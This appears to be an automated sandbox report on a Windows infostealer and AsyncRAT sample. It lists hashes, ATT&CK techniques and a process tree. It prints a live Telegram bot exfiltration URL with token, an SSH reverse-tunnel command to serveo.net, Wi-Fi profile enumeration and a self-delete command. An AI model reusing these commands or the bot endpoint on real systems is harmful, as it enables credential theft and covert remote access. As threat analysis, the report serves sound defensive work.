Analysis
-
max time kernel
30s -
max time network
31s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
16-08-2024 13:41
Behavioral task
behavioral1
Sample
jason test.exe
Resource
win11-20240802-en
General
-
Target
jason test.exe
-
Size
529KB
-
MD5
56acec58d46d6f079c16209f4347360a
-
SHA1
a7587f272a6afc0751ead66478d9a00742ce007e
-
SHA256
0ebe58286c1f137fa8502c2b9e6f0e60b451409a3caac4125ef0ea10c931024d
-
SHA512
724b8f625045c27fb6df5a29dda9ff889865349661c6d810b858b97f4ef33ff6a5bee30f5c61d73a304694589c937450dae7d98275fe1642001bb42b79050216
-
SSDEEP
6144:qbioob8+F2a9boZguBQNYPj2jBoO33tq6qbXaYBc1g5aN9KBBBBBBByygHG/bZ+V:Nd8xZguBiYPAq81g5aN+BVKD
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7375395402:AAEj5wSTewdwdI2lrdXYvNdlkLxj5pTH9pg/sendMessage?chat_id=6725988743
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x000100000002aa56-18.dat family_asyncrat -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Executes dropped EXE 2 IoCs
pid Process 4732 build.exe 448 Latypuh_LetThereBeCarnage.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe Key opened \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe Key opened \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3216 cmd.exe 2732 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 Taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName Taskmgr.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2804 timeout.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\ms-settings\shell\open\command Latypuh_LetThereBeCarnage.exe Set value (str) \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\ms-settings\shell\open\command\ Latypuh_LetThereBeCarnage.exe Key deleted \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\ms-settings\shell\open\command Latypuh_LetThereBeCarnage.exe Key deleted \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\ms-settings Latypuh_LetThereBeCarnage.exe Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\ms-settings Latypuh_LetThereBeCarnage.exe Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\ms-settings\shell Latypuh_LetThereBeCarnage.exe Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\ms-settings\shell\open Latypuh_LetThereBeCarnage.exe Key deleted \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\ms-settings\shell\open Latypuh_LetThereBeCarnage.exe Key deleted \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\ms-settings\shell Latypuh_LetThereBeCarnage.exe -
Suspicious behavior: EnumeratesProcesses 62 IoCs
pid Process 492 jason test.exe 4732 build.exe 4732 build.exe 448 Latypuh_LetThereBeCarnage.exe 4732 build.exe 4732 build.exe 4732 build.exe 4732 build.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 4732 build.exe 4732 build.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 4732 build.exe 4732 build.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 4732 build.exe 4732 build.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 4732 build.exe 4732 build.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 4732 build.exe 4732 build.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 4732 build.exe 4732 build.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 4732 build.exe 4732 build.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 448 Latypuh_LetThereBeCarnage.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 492 jason test.exe Token: SeIncreaseQuotaPrivilege 4364 WMIC.exe Token: SeSecurityPrivilege 4364 WMIC.exe Token: SeTakeOwnershipPrivilege 4364 WMIC.exe Token: SeLoadDriverPrivilege 4364 WMIC.exe Token: SeSystemProfilePrivilege 4364 WMIC.exe Token: SeSystemtimePrivilege 4364 WMIC.exe Token: SeProfSingleProcessPrivilege 4364 WMIC.exe Token: SeIncBasePriorityPrivilege 4364 WMIC.exe Token: SeCreatePagefilePrivilege 4364 WMIC.exe Token: SeBackupPrivilege 4364 WMIC.exe Token: SeRestorePrivilege 4364 WMIC.exe Token: SeShutdownPrivilege 4364 WMIC.exe Token: SeDebugPrivilege 4364 WMIC.exe Token: SeSystemEnvironmentPrivilege 4364 WMIC.exe Token: SeRemoteShutdownPrivilege 4364 WMIC.exe Token: SeUndockPrivilege 4364 WMIC.exe Token: SeManageVolumePrivilege 4364 WMIC.exe Token: 33 4364 WMIC.exe Token: 34 4364 WMIC.exe Token: 35 4364 WMIC.exe Token: 36 4364 WMIC.exe Token: SeIncreaseQuotaPrivilege 4364 WMIC.exe Token: SeSecurityPrivilege 4364 WMIC.exe Token: SeTakeOwnershipPrivilege 4364 WMIC.exe Token: SeLoadDriverPrivilege 4364 WMIC.exe Token: SeSystemProfilePrivilege 4364 WMIC.exe Token: SeSystemtimePrivilege 4364 WMIC.exe Token: SeProfSingleProcessPrivilege 4364 WMIC.exe Token: SeIncBasePriorityPrivilege 4364 WMIC.exe Token: SeCreatePagefilePrivilege 4364 WMIC.exe Token: SeBackupPrivilege 4364 WMIC.exe Token: SeRestorePrivilege 4364 WMIC.exe Token: SeShutdownPrivilege 4364 WMIC.exe Token: SeDebugPrivilege 4364 WMIC.exe Token: SeSystemEnvironmentPrivilege 4364 WMIC.exe Token: SeRemoteShutdownPrivilege 4364 WMIC.exe Token: SeUndockPrivilege 4364 WMIC.exe Token: SeManageVolumePrivilege 4364 WMIC.exe Token: 33 4364 WMIC.exe Token: 34 4364 WMIC.exe Token: 35 4364 WMIC.exe Token: 36 4364 WMIC.exe Token: SeDebugPrivilege 4732 build.exe Token: SeDebugPrivilege 448 Latypuh_LetThereBeCarnage.exe Token: SeDebugPrivilege 4728 Taskmgr.exe Token: SeSystemProfilePrivilege 4728 Taskmgr.exe Token: SeCreateGlobalPrivilege 4728 Taskmgr.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe 4728 Taskmgr.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 448 Latypuh_LetThereBeCarnage.exe 4732 build.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 492 wrote to memory of 968 492 jason test.exe 81 PID 492 wrote to memory of 968 492 jason test.exe 81 PID 968 wrote to memory of 4364 968 cmd.exe 83 PID 968 wrote to memory of 4364 968 cmd.exe 83 PID 492 wrote to memory of 4732 492 jason test.exe 85 PID 492 wrote to memory of 4732 492 jason test.exe 85 PID 492 wrote to memory of 448 492 jason test.exe 86 PID 492 wrote to memory of 448 492 jason test.exe 86 PID 492 wrote to memory of 2864 492 jason test.exe 87 PID 492 wrote to memory of 2864 492 jason test.exe 87 PID 2864 wrote to memory of 2804 2864 cmd.exe 89 PID 2864 wrote to memory of 2804 2864 cmd.exe 89 PID 4732 wrote to memory of 3216 4732 build.exe 90 PID 4732 wrote to memory of 3216 4732 build.exe 90 PID 3216 wrote to memory of 3820 3216 cmd.exe 93 PID 3216 wrote to memory of 3820 3216 cmd.exe 93 PID 3216 wrote to memory of 2732 3216 cmd.exe 94 PID 3216 wrote to memory of 2732 3216 cmd.exe 94 PID 3216 wrote to memory of 2120 3216 cmd.exe 95 PID 3216 wrote to memory of 2120 3216 cmd.exe 95 PID 4732 wrote to memory of 72 4732 build.exe 96 PID 4732 wrote to memory of 72 4732 build.exe 96 PID 72 wrote to memory of 1952 72 cmd.exe 98 PID 72 wrote to memory of 1952 72 cmd.exe 98 PID 72 wrote to memory of 3036 72 cmd.exe 99 PID 72 wrote to memory of 3036 72 cmd.exe 99 PID 72 wrote to memory of 4760 72 cmd.exe 100 PID 72 wrote to memory of 4760 72 cmd.exe 100 PID 4732 wrote to memory of 3192 4732 build.exe 101 PID 4732 wrote to memory of 3192 4732 build.exe 101 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\jason test.exe"C:\Users\Admin\AppData\Local\Temp\jason test.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:492 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /C wmic path win32_ComputerSystem get model2⤵
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_ComputerSystem get model3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4364
-
-
-
C:\Users\Admin\AppData\Local\Temp\nZLDYKrFaM\build.exe"C:\Users\Admin\AppData\Local\Temp\nZLDYKrFaM\build.exe"2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:4732 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:3820
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2732
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"4⤵PID:2120
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"3⤵
- Suspicious use of WriteProcessMemory
PID:72 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:1952
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3036
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"4⤵PID:4760
-
-
-
C:\Windows\System32\OpenSSH\ssh.exe"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3724 serveo.net3⤵PID:3192
-
-
-
C:\Users\Admin\AppData\Local\Temp\cRWlRBoVEkJF\Latypuh_LetThereBeCarnage.exe"C:\Users\Admin\AppData\Local\Temp\cRWlRBoVEkJF\Latypuh_LetThereBeCarnage.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 3 && DEL /f "C:\Users\Admin\AppData\Local\Temp\jason test.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\system32\timeout.exeTIMEOUT /T 33⤵
- Delays execution with timeout.exe
PID:2804
-
-
-
C:\Windows\System32\Taskmgr.exe"C:\Windows\System32\Taskmgr.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4728
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
1Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
405KB
MD59bed44cbd66a6ac9ba58bd121cc31120
SHA1ec7479fcf0b9574bbcd155cba27bcd3b73d2a80d
SHA256488e8ae508c7fab6587ec3e5640e9edb61c397667dc5e799322bb76d8ffc3a02
SHA512f639c53e6b24f7afb0a24172f4ea7f5a453d5d123ea35340533ad3476efb8cb7b510cf22eb75bb47f06e830b0fa9250ee10df7cab93a4f37bd676b1ada3678b8
-
Filesize
115KB
MD56cba0a7c6d100f3e95efbeb4c14880ce
SHA111b39ee1e96aba2a001f5a74ff4dcf2749e6bdbe
SHA2568eb6369c9fa16e155ca29cedff0fd812ccb1d0ba9c0a3af912744a2e7e7167c3
SHA512e3e57ce5dacd83677d4b0c5824adb130123708c2ecc06d7d3e9e8be99ac00a542451b932f631e67dcfa2f8805369da5b95883c62f50b88dcd2471ed6432ca3f8